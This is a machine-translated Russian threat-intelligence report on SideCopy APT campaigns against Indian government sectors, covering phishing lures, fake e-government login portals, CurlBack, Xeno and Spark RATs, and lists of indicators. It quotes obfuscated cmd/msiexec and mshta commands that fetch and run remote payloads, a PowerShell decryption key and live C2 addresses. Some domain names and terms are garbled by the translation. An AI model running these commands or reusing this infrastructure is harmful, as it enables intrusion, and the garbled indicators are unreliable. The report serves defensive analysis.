Seqrite Команда Labs APT обнаружила новые тактики связанной с Пакистаном APT-группировки SideCopy, применяемые с последней недели декабря 2024 года. Группа расширила сферу своих атак, выйдя за рамки индийского правительства, оборонного, морского секторов и студентов университетов, и теперь включает в себя организации, находящиеся в ведении министерств железных дорог, нефти и газа, а также иностранных дел. Одним из заметных изменений в последних кампаниях является переход от использования файлов HTML-приложений (HTA) к использованию пакетов Microsoft Installer (MSI) в качестве основного механизма развертывания.
Злоумышленники постоянно совершенствуют свою тактику, чтобы избежать обнаружения, и этот сдвиг обусловлен их постоянным использованием сторонних DLL-загрузок и многоплатформенных вторжений. Эта эволюция также включает такие методы, как рефлексивная загрузка и перепрофилирование инструментов с открытым исходным кодом, таких как Xeno RAT и Spark RAT, в соответствии с его трендов с асинхронным RAT для расширения его возможностей. Кроме того, была обнаружена новая полезная нагрузка, получившая название CurlBack RAT, которая регистрирует жертву на сервере C2.
Ключевые результаты
- Имена пользователей, связанные с идентификаторами электронной почты злоумышленников, выдают себя за сотрудников государственных органов, имеющих опыт работы в сфере кибербезопасности, используя скомпрометированные идентификаторы.
- Поддельный домен, имитирующий службу электронного правительства, с открытым каталогом используется для размещения полезных нагрузок и страниц входа в систему для фишинга учетных данных.
- На тринадцати поддоменах и URL-адресах размещены страницы входа в различные службы RTS для нескольких городских муниципальных корпораций (CMC), все в штате Махараштра.
- Официальный домен Национального гидрологического проекта (NHP), находящегося в ведении Министерства водных ресурсов, был взломан с целью доставки вредоносных данных.
- Новые тактики, такие как рефлексивная загрузка и расшифровка AES раздела ресурсов через PowerShell, для развертывания пользовательской версии инструмента с открытым исходным кодом на базе C# XenoRAT.
- Модифицированный вариант инструмента SparkRAT с открытым исходным кодом на базе Golang, предназначенный для платформ Linux, был развернут через тот же стейджер ранее использовался для полезных нагрузок Poseidon и Ares RAT.
- Используется новый RAT, получивший название CurlBack, использующий технику загрузки DLL. Он регистрирует жертву на сервере C2 по UUID и поддерживает передачу файлов с помощью curl.
- Кампании под названием «медовая ловушка» наблюдались в январе 2025 года и июне 2024 года, что совпало с арестом государственного служащего, обвиняемого в передаче конфиденциальных данных пакистанскому куратору.
- Образовательный портал, ранее взломанный в августе 2024 года, вновь активировался в феврале 2025 года с новыми URL-адресами, ориентированными на студентов университетов. Они посвящены трём различным темам: «Изменение климата», «Исследовательская работа» и «Профессиональная деятельность» (полный анализ можно посмотреть в записи). здесь, объясняя шесть различных кластеров SideCopy APT).
- Родительская группа SideCopy, APT36, нацелилась на Афганистан после долгой кампании, связанной с Управлением по делам заключённых (OPA) Исламского Эмирата Афганистан. Недавняя кампания, направленная на системы Linux под девизом «Развитие лидерства для будущих войн», использует шифрование AES/RC4 для запуска инструмента MeshAgent RMM.
Целевые секторы в ведении индийского министерства
- Железнодорожные пути
- Нефть и Газ
- внешние связи
- Обороны
Фишинговые письма
Кампания, направленная на оборонный сектор, началась с фишингового письма от 13 января 2025 года с темой «Обновите график NDC 65, как обсуждалось». В письме содержалась ссылка на скачивание файла «NDC65-Updated-Schedule.pdf», призванного заманить жертву.

Второе фишинговое письмо, отправленное 15 января 2025 года с темой «Обновление политики для этого курса.txt», также содержит фишинговую ссылку. Это письмо отправлено с адреса электронной почты, выглядящего как официальный, но, вероятно, взломанного. Национальный колледж обороны (NDC) — это военное учебное заведение, специализирующееся на стратегии и практике национальной безопасности, расположенное в Дели и подчиняющееся Министерству обороны Индии.

Адрес электронной почты злоумышленника «gsosystems-ndc@outlook[.]com» был создан 10 января 2025 года в ОАЭ и последний раз был активен 28 февраля 2025 года. OSINT выявил похожий идентификатор электронной почты «gsosystems.ndc-mod@nic[.]in», принадлежащий Национальному центру информатики (NIC), подразделению Министерства электроники и информационных технологий Индии (MeitY). Имя пользователя, связанное с адресом электронной почты злоумышленника, выдаёт себя за сотрудника государственного органа, имеющего опыт работы в сфере кибербезопасности.

Документы-обманки
Ложная модель связана с Национальным колледжем обороны (NDC) в Индии и содержит ежегодный календарь подготовки (учебные занятия и мероприятия) на 2025 год для 65-го курса (NDC-65). Расположенный в Нью-Дели, этот учебный институт является высшим центром стратегического обучения для офицеров Вооружённых сил Индии и гражданских служб, находящихся в ведении Министерства обороны Индии.




OpenDir и CredPhish
Для проведения кампании, направленной против железнодорожных компаний, использовался поддельный домен, выдающий себя за портал электронного управления. Этот домен был создан 16 июня 2023 года и представляет собой открытый каталог с несколькими файлами, выявленными в ходе расследования.

Всего было выявлено 13 поддоменов, которые функционируют как порталы входа в различные системы, такие как:
- Webmail
- Система управления безопасными резервуарами
- Система начисления заработной платы
- Установить полномочия
Вероятно, они используются для фишинга учётных данных, активно выдавая себя за несколько легитимных правительственных порталов с прошлого года. Эти страницы входа, как правило, связаны с RTS Services (Закон о праве на общественные услуги) и обслуживают различные городские муниципальные корпорации (CMC). Все эти поддельные порталы принадлежат городам, расположенным в штате Махараштра:
- Чандрапур
- Gadchiroli
- Akola
- Satara
- Васаи Вирар
- Балларпур
- Мира Бхайндар

В следующей таблице перечислены выявленные поддомены и даты их первого обнаружения:
| Суб-домены | Впервые увидели |
| gadchiroli.egovservice[.]in | 2024-12-16 |
| pen.egovservice[.]в | 2024-11-27 |
| cpcontacts.egovservice[.]в
cpanel.egovservice[.]в webdisk.egovservice[.]в cpcalendars.egovservice[.]в webmail.egovservice[.]в |
2024-01-03 |
| dss.egovservice[.]в
cmc.egovservice[.]в |
2023-11-03 |
| mail.egovservice[.]в | 2023-10-13 |
| pakola.egovservice[.]в
pakora.egovservice[.]в |
2023-07-23 |
| egovservice[.]в | 2023-06-16 |
Все эти домены имеют следующую историю DNS, изначально зарегистрированную под AS 140641 (YOTTA NETWORK SERVICES PRIVATE LIMITED). Это указывает на возможную скоординированную инфраструктуру, созданную для имитации легитимных сервисов и сбора учётных данных ничего не подозревающих пользователей.

Дальнейшее исследование открытого каталога выявило дополнительные URL-адреса, связанные с поддельным доменом. Эти URL-адреса, вероятно, служат аналогичным фишинговым целям и содержат дополнительный поддельный контент.
| hxxps://egovservice.in/vvcmcrts/ |
| hxxps://egovservice.in/vvcmc_safety_tank/ |
| hxxps://egovservice.in/testformonline/test_form |
| hxxps://egovservice.in/payroll_vvcmc/ |
| hxxps://egovservice.in/pakora/egovservice.in/ |
| hxxps://egovservice.in/dssrts/ |
| hxxps://egovservice.in/cmc/ |
| hxxps://egovservice.in/vvcmcrtsballarpur72/ |
| hxxps://egovservice.in/dss/ |
| hxxps://egovservice.in/130521/set_authority/ |
| hxxps://egovservice.in/130521/13/ |
Кластер-А
Первый кластер операций SideCopy демонстрирует сложный подход, одновременно атакуя среды Windows и Linux. В их арсенале появились новые трояны удалённого доступа (RAT), что расширяет возможности по эффективному взлому различных систем.

Windows
Фишинговая ссылка в письме загружает архивный файл, содержащий ярлык с двойным расширением (.pdf.lnk). Они размещены на доменах, которые выглядят как настоящие:
| hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/ |
| hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/ |
Триггеры быстрого доступа cmd.exe с аргументами, использующими экранированные символы (^) для обхода обнаружения и ухудшения читаемости. В этих файлах отображается новый идентификатор машины «dv-kevin», поскольку обычно вместо него используется префикс «desktop-».

Утилита msiexec.exe используется для установки MSI-пакетов, размещенных удалённо. Она использует флаг тихого режима с ключом установки.
| C:\Windows\System32\cmd.exe /cm^s^i^e^x^e^c.exe /q /ih^t^t^p^s^:^/^/^e^g^o^v^s^e^r^v^i^c^e^.^i^n^/^d^s^s^r^t^s^/^h^e^l^p^e^r^s^/^f^o^n^t^s^/^2^0^2^4^-^N^a^t^i^o^nal-^H^o^l^i^d^a^y^s^-^R^H^-^P^E^R^_^N-^1^/^i^n^s^t^/ |
| C:\Windows\System32\cmd.exe /cm^s^i^e^x^e^c.exe /q /ih^t^t^p^s^:^/^/^n^h^p^.^m^o^w^r^.^g^o^v^.^i^n^/^N^H^P^M^I^S^/^T^r^a^i^n^i^n^g^M^a^t^e^r^i^a^l^/^a^s^p^x^/^S^e^c^u^r^i^t^y^-^G^u^i^d^e^l^i^n^e^s^/^w^o^n^t^/ |
Первый домен имитирует поддельный сайт электронного правительства, обнаруженный в открытом каталоге, а второй — взломанный домен, принадлежащий официальному Национальному гидрологическому проекту, организации, подведомственной Министерству водных ресурсов. MSI-файл содержит исполняемый файл .NET. ConsoleApp1.exe который сбрасывает несколько PE-файлов в кодировке Base64. Сначала сбрасывается документ-обманка Общая каталог и открывается, тогда как оставшиеся PE-файлы помещаются в 'C:\ProgramData\LavaSoft\'. Среди них есть две DLL:
- Легитимная DLL: Sampeose.dll
- Вредоносная DLL: DUI70.dll, идентифицированный как CurlBack RAT.

CurlBack RAT
Подписанный двоичный файл Windows girbesre.exe с оригинальным именем Настройки камерыUIHost.exe размещается рядом с DLL-файлами. При запуске EXE-файл загружает вредоносную DLL-библиотеку. Устойчивость достигается за счёт размещения HTA-скрипта (svnides.hta), который создаёт раздел реестра «Run» для EXE-файла. Были обнаружены два разных образца вредоносной DLL-библиотеки с метками времени компиляции 2024-12-24 и 2024-12-30.

CurlBack RAT изначально проверяет ответ на определённый URL-адрес с помощью команды '/antivmcommand'. Если ответ «on», он продолжает работу, в противном случае завершает работу, продолжая проверку. Он собирает информацию о системе и всех подключённых USB-устройствах, используя раздел реестра:
- «SYSTEM\\ControlSet001\\Enum\\USBSTOR»

Подключенные дисплеи и запущенные процессы перечисляются для проверки explorer, msedge, chrome, notepad, taskmgr, services, Defender и settings.

Затем он генерирует UUID для регистрации клиента на сервере C2. Сгенерированный идентификатор сохраняется в «C:\Пользователи\ \.client_id.txt” вместе с именем пользователя.

Перед регистрацией с помощью идентификатора сохранение настраивается с помощью запланированной задачи с именем «Один диск» для законного двоичного файла, который можно наблюдать в месте: «C:\Windows\System32\Tasks\OneDrive».

Обратные строки, добавленные к домену C2, и их назначение:
| строка | Функциональность системы |
| /ретсигер/ | Зарегистрируйте клиента в C2 |
| /sdnammoc/ | Получить команды из C2 |
| /taebtraeh/ | Регулярно проверяйте соединение с C2. |
| /stluser/ | Загрузите результаты в C2 |
После регистрации соединение сохраняется активным для извлечения любых команд, возвращаемых в ответе.

Если ответ содержит какое-либо значение, он извлекает текущую метку времени и выполняет одну из следующих команд C2:
| Command | Функциональность системы |
| info | Сбор информации о системе |
| скачать | Скачать файлы с хоста |
| настойчивость | Изменить настройки сохранения |
| пробег | Выполнять произвольные команды |
| извлечение | Извлечь данные из системы |
| разрешение | Проверить и повысить привилегии |
| пользователей | Перечислить учетные записи пользователей |
| CMD | Выполнение операций командной строки |

Другие базовые функции включают получение данных пользователя и хоста, извлечение архивных файлов и создание задач. Строки и код показывают, что во вредоносной DLL присутствует CURL для перечисления и передачи различных форматов файлов:
- Файлы изображений: GIF, JPEG, JPG, SVG
- Текстовые файлы: TXT, HTML, PDF, XML

Linux
Помимо атак, ориентированных на Windows, первый кластер SideCopy также нацелен на среды Linux. Вредоносный архивный файл имеет то же имя, что и его аналог для Windows, но дата модификации — 2024 декабря 12 г. Этот архив содержит двоичный файл ELF на языке Go, что отражает последовательную кроссплатформенную стратегию. Анализ показал, что поток функций стейджера имеет сходство с кодом стейджеры Связаны с Poseidon и Ares RAT. Они связаны с APT-системами Transparent Tribe и SideCopy соответственно.

Функциональность Stager:
- Пользы Wget команда для загрузки приманки из egovservice домен в целевой каталог /.local/share и откройте его (National-Holidays-RH-PER_N-1.pdf).
- Загрузите финальную полезную нагрузку эльф as /.local/share/xdg-open и выполнить.
- Создайте файл crontab '/dev/shm/mycron' для сохранения полезной нагрузки при перезагрузке системы под текущим именем пользователя.
Последняя полезная нагрузка, предоставляемая стейджером, — это Spark RAT, троян удалённого доступа с открытым исходным кодом и кроссплатформенной поддержкой Windows, macOS и Linux. Написанный на Golang и выпущенный на GitHub в 2022 году, RAT пользуется большой популярностью: существует более 500 форков. Spark RAT использует протокол WebSocket и HTTP-запросы для взаимодействия с сервером управления.

Возможности Spark RAT включают управление процессами и их завершение, мониторинг сетевого трафика, просмотр и передачу файлов, редактирование и удаление файлов, подсветку кода, мониторинг рабочего стола, создание снимков экрана, получение информации об ОС и удалённый терминальный доступ. Кроме того, Spark RAT поддерживает функции управления питанием, такие как выключение, перезагрузка, выход из системы, спящий режим, режим гибернации и блокировка экрана.
Кластер-Б
Вторая группа действий SideCopy нацелена на системы Windows, хотя мы подозреваем, что она нацелена на системы Linux, основываясь на их инфраструктуре, наблюдаемой с 2023 года.

Заражение начинается с фишинговой ссылки в электронном письме, которая загружает архивный файл с именем «NDC65-Updated-Schedule.zip». Он содержит файл-ярлык в формате с двойным расширением, который запускает удалённый HTA-файл, размещённый на другом скомпрометированном домене:
- «hxxps://modspaceinterior.com/wp-content/upgrade/01/ & mshta.exe»

Идентификатор машины, связанный с LNK «desktop-ey8nc5b», наблюдался в предыдущих кампаниях SideCopy, хотя дата модификации «2023:05:26» позволяет предположить, что это может быть более старый идентификатор, используемый повторно. Параллельно с MSI-стейджерами, группа продолжает использовать стейджеры на базе HTA, которые остаются практически незамеченными (FUD).

Файл HTA содержит полезную нагрузку .NET, закодированную в Base64. BroaderAspect.dll, который декодируется и загружается непосредственно в память MSHTA. Этот двоичный файл открывает сброшенный документ-приманку NDC в ProgramData каталог и дополнительный .NET-шаг в виде PDF-файла в Общая Каталог. Устойчивость устанавливается через ключ реестра «Run» с именем «Edgre» и выполняется как:
cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf
Зашифрованная полезная нагрузка
Удаленный двоичный файл .NET с именем «Myapp.pdb» имеет два файла ресурсов:
- «Myapp.Resources.Document.pdf»
- «Myapp.Properties.Resources.resources»
Первый из них декодируется с помощью Цезарь Шифр со сдвигом на 9 символов в обратном направлении. Отбрасывается как 'Публичные\Загрузки\Документ.pdf(122.98 КБ), представляющий собой документ GIAC 2004 года «Усовершенствованные методы связи троянских программ удаленного доступа в операционных системах Windows».

Хотя это не обманка, в конце добавляется зашифрованная полезная нагрузка. Вредоносная программа ищет «%%EOFМаркер "" отделяет данные PDF от данных EXE. Данные PDF извлекаются от начала до маркера, а данные EXE извлекаются после пропуска 6 байтов после маркера.

После некоторой задержки данные EXE удаляются как «Публичные\Загрузки\suport.exe» (49.53 КБ), который отправляется как аргумент вместе с ключом для запуска команды PowerShell.

Стадия PowerShell
Наблюдается выполнение команды PowerShell с базовыми аргументами «-NoProfile -ExecutionPolicy Bypass -Command» для игнорирования политик и профиля. Передаются два параметра:
-EPath 'C:\\Users\\Public\\Downloads\\suport.exe'-EKey 'wq6AHvkMcSKA++1CPE3yVwg2CpdQhEzGbdarOwOrXe0='
После некоторой задержки ключ шифрования декодируется из Base64, и первые 16 байт обрабатываются как вектор инициализации (IV) для шифрования AES (режим CBC с дополнением PKCS7). Это делается для загрузки расшифрованного двоичного файла как сборки .NET непосредственно в память, вызывая её точку входа.

Кастомный Xeno RAT
Выгрузка последней полезной нагрузки .NET под названием «DevApp.exe» приводит нас к знакомым функциям, встречающимся в Xeno RAT. Это троян с открытым исходным кодом для удалённого доступа, впервые замеченный в конце 2023 года. Среди его ключевых особенностей — HVNC, доступ к микрофону в режиме реального времени, обратный прокси-сервер Socks5, обход UAC, кейлоггер и многое другое. В пользовательской версии, используемой SideCopy, добавлены базовые методы манипуляции строками с помощью C2 и порта 79.141.161[.]58:1256.

В прошлом году модифицированный вариант Xeno RAT под названием MoonPeak использовался связанной с Северной Кореей группировкой APT, отслеживаемой как UAT-5394. Аналогичным образом, модифицированные варианты Spark RAT использовались китайскоязычными группировками, такими как DragonSpark и TAG-100.
Инфраструктура и атрибуция
Домены, используемые группой для размещения вредоносного ПО. Большинство из них зарегистрированы как GoDaddy.com, LLC.
| Промежуточный домен | Впервые увидели | Создано | ASN |
| modspaceinterior[.]com | Январь 2025 | сентябрь 2024 | AS 46606 – GoDaddy |
| drjagrutichavan[.]com | Январь 2025 | октябрь 2021 | AS 394695 – GoDaddy |
| nhp.mowr[.]gov[.]in | Декабрь 2024 | февраль 2005 | AS 4758 – Национальный центр информатики |
| egovservice[.]в | Декабрь 2024 | Июнь 2023 | AS 140641 – GoDaddy |
| pmshriggssssiwan[.]in | ноябрь 2024 | Mar 2024 | AS 47583 – Хостингер |
| образовательные порталы[.]в | август 2024 | август 2024 | AS 22612 – NameCheap |
Домены C2 были созданы непосредственно перед кампанией в последнюю неделю декабря 2024 года. У канадского регистратора «Internet Domain Service BS Corp.» они преобразуются в IP-адреса с Cloudflare ASN 13335, расположенные в Калифорнии.
| Домен C2 | Создано | IP | ASN |
| обновления.widgetservicecenter[.]com | 2024-Dec-25 | 104.21.15[.]163
172.67.163[.]31
|
ASN 13335 – Облако |
| updates.biossysinternal[.]com | 2024-Dec-23 | 172.67.167[.]230
104.21.13[.]17 |
ASN 202015 – HZ Hosting Ltd. |
C2 для Xeno RAT 79.141.161[.]58 имеет уникальное общее имя (CN=PACKERP-63KUN8U) у HZ Hosting Limited из ASN 202015. Для связи используется порт 1256, но также наблюдается открытый порт RDP 56777.

Оба домена C2 связаны с Cloudflare ASN 13335, разрешенным в диапазон IP-адресов 172.67.xx.xx. Аналогичные домены C2 в этом ASN ранее использовались SideCopy для атак, направленных на морской С учётом прошлых кластеров заражения, наблюдаемых TTP и размещенных открытых каталогов, эти кампании с новыми TTP с высокой степенью достоверности можно отнести к SideCopy.
Заключение
Связанная с Пакистаном APT-группа SideCopy значительно усовершенствовала свою тактику с конца декабря 2024 года, расширив круг своих целей, включив в них такие критически важные секторы, как железные дороги, нефтегазовая отрасль и министерства иностранных дел. Группировка перешла от использования HTA-файлов к MSI-пакетам в качестве основного механизма реализации атак и продолжает применять передовые методы, такие как сторонняя загрузка DLL, рефлективная загрузка и расшифровка AES через PowerShell. Кроме того, они используют специализированные инструменты с открытым исходным кодом, такие как Xeno RAT и Spark RAT, а также недавно обнаруженный CurlBack RAT. Скомпрометированные домены и поддельные сайты используются для фишинга учетных данных и размещения полезной нагрузки, что свидетельствует о постоянных усилиях группировки по повышению устойчивости и уклонению от обнаружения.
SEQRITE Protection
- LNK.SideCopy.49245.Gen
- LNK.Trojan.49363.GC
- SideCopy.Mal.49246.GC
- HTA.SideCopy.49248.Gen
- HTA.SideCopy.49247.Gen
- HTA.Trojan.49362.GC
- Trojan.Fmq
МНК
Windows
| a5410b76d0cb36786e00d2968d3ab6e4 | 2024-Национальные-Праздники-RH-PER_N-1.zip |
| f404496abccfa93eed5dfda9d8a53dc6 | 2024-Национальные-Праздники-RH-PER_N-1.pdf.lnk |
| 0e57890a3ba16b1ac0117a624f262e61 | Security-Guidelines.zip |
| 57c2f8b4bbf4037439317a44c2263346 | Руководство по безопасности.pdf.lnk |
| 53eebedc3846b7cf5e29a90a5b96c803 | wininstaller.msi |
| 97c3328427b72f05f120e9a98b6f9b09 | installerr.msi |
| 0690116134586d41a23baed300fc6355 | ConsoleApp1.exe |
| ef40f484e095f0f6f207139cb870a16e | ConsoleApp1.exe |
| 9d189e06d3c4cefdd226e645a0b8bdb9 | DUI70.dll |
| 589a65e0f3fe6777d17d0ac36ab07f6f | DUI70.dll |
| 0eb9e8bec7cc70d603d2d8b6efdd6bb5 | график обновления для ndc 65, как обсуждалось.txt |
| 8ceeeec0e33026114f028cbb006cb7fc | обновление политики для этого курса.txt |
| 1d65fa0457a9917809660fff782689fe | NDC65-Обновленное-Расписание.zip |
| 7637cbfa99110fe8e1074e7ead66710e | NDC65-Обновленное-Расписание.pdf.lnk |
| 32a44a8f7b722b078b647e82cb9e85cf | NDC65-Обновленное-Расписание.hta |
| a2dc9654b99f656b4ab30cf5d97fe2e1 | BroaderAspect.dll |
| b45aa156aef2ad2c77b7c623a222f453 | zuidrt.pdf |
| 83ce6ee6ad09a466eb96f347a8b0dc20 | Документ.pdf |
| cf6681cf1f765edb6cae81eeed389f78 | support.exe |
| c952aca2036d6646c0cffde9e6f22775 | DevApp.exe (пользовательский Xeno RAT) |
Linux
| b5e71ff3932c5ef6319b7ca70f7ba8da | 2024-Национальные-Праздники-RH-PER_N-1.zip |
| 0a67bfda993152c93a212087677f9b60 | 2024-Национальные-Праздники-RH-PER_N-1․pdf |
| e165114280204c39e99cf0c650477bf8 | clinsixfer.elf (пользовательский Spark RAT) |
C2
| 79.141.161[.]58:1256 | Ксено КРЫСА |
| обновления.widgetservicecenter[.]com
updates.biossysinternal[.]com |
CurlBack RAT |
URL-адреса
| hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/ |
| hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/inst/ |
| hxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/clinsixfer.elf |
| hxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/2024-National-Holidays-RH-PER_N-1.pdf |
| hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/ |
| hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/wont/ |
| hxxps://updates.widgetservicecenter.com/antivmcommand |
| hxxps://modspaceinterior.com/wp-content/upgrade/02/NDC65-Updated-Schedule.zip |
| hxxps://modspaceinterior.com/wp-content/upgrade/01/ |
| hxxps://modspaceinterior.com/wp-content/upgrade/01/NDC65-Updated-Schedule.hta |
| hxxps://egovservice.in/vvcmcrts/ |
| hxxps://egovservice.in/vvcmc_safety_tank/ |
| hxxps://egovservice.in/testformonline/test_form |
| hxxps://egovservice.in/payroll_vvcmc/ |
| hxxps://egovservice.in/pakora/egovservice.in/ |
| hxxps://egovservice.in/dssrts/ |
| hxxps://egovservice.in/cmc/ |
| hxxps://egovservice.in/vvcmcrtsballarpur72/ |
| hxxps://egovservice.in/dss/ |
| hxxps://egovservice.in/130521/set_authority/ |
| hxxps://egovservice.in/130521/13/ |
Промежуточные домены
| modspaceinterior[.]com |
| drjagrutichavan[.]com |
| nhp.mowr[.]gov[.]in |
| pmshriggssssiwan[.]in |
| образовательные порталы[.]в |
| egovservice[.]в |
| gadchiroli.egovservice[.]in
pen.egovservice[.]в cpcontacts.egovservice[.]в cpanel.egovservice[.]в webdisk.egovservice[.]в cpcalendars.egovservice[.]в webmail.egovservice[.]в www.dss.egovservice[.]в www.cmc.egovservice[.]в cmc.egovservice[.]в dss.egovservice[.]в mail.egovservice[.]в www.egovservice[.]в www.pakola.egovservice[.]в pakola.egovservice[.]в www.pakora.egovservice[.]в pakora.egovservice[.]в |
Хост и PDB
| C:\ProgramData\LavaSoft\Sampeose.dll |
| C:\ProgramData\LavaSoft\DUI70.dll |
| C:\ProgramData\LavaSoft\girbesre.exe |
| C:\ProgramData\LavaSoft\svnides.hta |
| C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf |
| C:\Users\Public\Downloads\Document.pdf |
| C:\Users\Public\Downloads\suport.exe |
| E:\finalRnd\Myapp\obj\Debug\Myapp.pdb |
Приманки
| 320bc4426f4f152d009b6379b5257c78 | 2024-Национальные-Праздники-RH-PER_N-1.pdf |
| 9de50f9357187b623b06fc051e3cac4f | Руководство по безопасности.pdf |
| c9c98cf1624ec4717916414922f196be | NDC65-Обновленное-Расписание.pdf |
| 83ce6ee6ad09a466eb96f347a8b0dc20 | Документ.pdf |
MITRE ATT & CK
| ТТП | Имя |
| разведывательный | |
| T1589.002 | Сбор информации о личности жертвы: адреса электронной почты |
| Развитие ресурсов | |
| T1583.001
T1584.001 T1587.001 T1588.001 T1588.002 T1608.001 T1608.005 T1585.002 T1586.002 |
Приобретение инфраструктуры: домены
Инфраструктура компрометации: домены Возможности развития: вредоносное ПО Получить возможности: вредоносное ПО Получить возможности: инструмент Возможности этапа: загрузка вредоносного ПО Возможности этапа: Ссылка на цель Создание учетных записей: учетные записи электронной почты Взлом учетных записей: учетные записи электронной почты |
| Первоначальный доступ | |
| T1566.002 | Фишинг: Ссылка на фишинг |
| Типы | |
| T1106
T1129 T1059 T1047 T1204.001 T1204.002 |
Родной API
Общие модули Интерпретатор команд и сценариев Инструментарий управления Windows Казнь пользователя: вредоносная ссылка Пользовательское выполнение: вредоносный файл |
| Настойчивость | |
| T1053.003
T1547.001 |
Запланированная задача/задание: Cron
Ключи запуска реестра / Папка автозагрузки |
| Повышение привилегий | |
| T1548.002 | Злоупотребление механизмом контроля за повышением прав: обход контроля учетных записей пользователей |
| Уклонение от защиты | |
| T1036.005
T1036.007 T1140 T1218.005 T1574.002 T1027 T1620 |
Маскарадинг: Соответствие законному имени или местоположению
Маскарад: двойное расширение файла Деобфускация/декодирование файлов или информации Выполнение системного двоичного прокси: Mshta Поток выполнения Hijack: боковая загрузка DLL Замаскированные файлы или информация Отражающая загрузка кода |
| Дискавери | |
| T1012
T1016 T1033 T1057 T1082 T1083 T1518.001 |
Реестр запросов
Обнаружение конфигурации сети системы Обнаружение владельца системы/пользователя Обнаружение процесса Обнаружение системной информации Обнаружение файлов и каталогов Обнаружение программного обеспечения: обнаружение программного обеспечения безопасности |
| | |
| T1005
T1056.001 T1123 T1113 T1560.001 |
Данные из локальной системы
Захват ввода: кейлоггинг Аудиозапись Захват экрана Архивировать собранные данные: Архивировать с помощью утилиты |
| Управление и контроль | |
| T1105
T1571 |
Входной инструмент передачи
Нестандартный порт |
| эксфильтрации | |
| T1041 | Эксфильтрация через канал C2 |
Авторы:
Сатвик Рам Пракки
Картикумар Дживани



